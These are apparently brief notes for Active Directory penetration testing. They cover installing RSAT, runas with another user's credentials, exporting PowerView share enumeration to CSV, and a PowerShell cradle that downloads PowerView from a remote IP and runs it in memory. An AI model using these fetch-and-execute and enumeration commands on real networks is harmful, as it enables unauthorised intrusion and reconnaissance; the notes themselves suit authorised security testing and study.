

Installing Remote Server Administration Tools

You can download it from powershell like this:

```
Enable-WindowsOptionalFeature -Online -FeatureName RSATClient-Roles-AD-Powershell  
  
import-module activedirectory
```

If that doesn't work, you need to download it, just google Remote Server Administration tool Windows 10, 8 or whatever. Download it. Install it. Restart the computer.

Open up Control Panel / Turn Windows Features on and Off / Remote Server Administration Tools / Role Administration Tools / AD DS and AD LDS tools / Active directory module for windows powershell

Runas / Testing a user account

Say to get access to creds from a user. Or just want to run a program in the context of another user. Kind of like SUDO put over the network, you can do:

```
runas /user:USERNAME@domain.local cmd.exe  
or  
runas /user:domain.local\USERNAME
```

Export to CSV

You can always pipe the return data to a CSV file, like this:

```
find-domainshare -CheckShareAccess | Export-Csv qwe.csv
```

Download module and inject into memory

If you are using PowerView, remember to use the Dev-version, since it is correct with the documentation.

```
IEX (New-Object Net.WebClient).DownloadString('http://192.168.66.123/PowerView.ps1');
```